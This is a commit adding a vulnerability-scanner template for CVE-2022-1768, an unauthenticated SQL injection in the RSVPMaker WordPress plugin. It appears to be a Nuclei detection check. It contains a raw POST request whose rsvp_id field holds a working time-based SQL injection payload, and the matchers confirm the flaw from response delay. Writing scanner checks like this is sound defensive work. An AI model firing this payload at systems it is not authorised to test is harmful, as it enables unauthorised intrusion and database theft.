Add CVE-2022-1768
parent
b2f853b914
commit
7cb29a448d
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2022-1768
|
||||
|
||||
info:
|
||||
name: RSVPMaker WordPress plugin <= 9.3.2 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2.
|
||||
reference:
|
||||
- https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1768
|
||||
classification:
|
||||
cve-id: CVE-2022-1768
|
||||
tags: cve,rsvpmaker,wordpress,wordpressplugin,sqli,cve2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
rsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue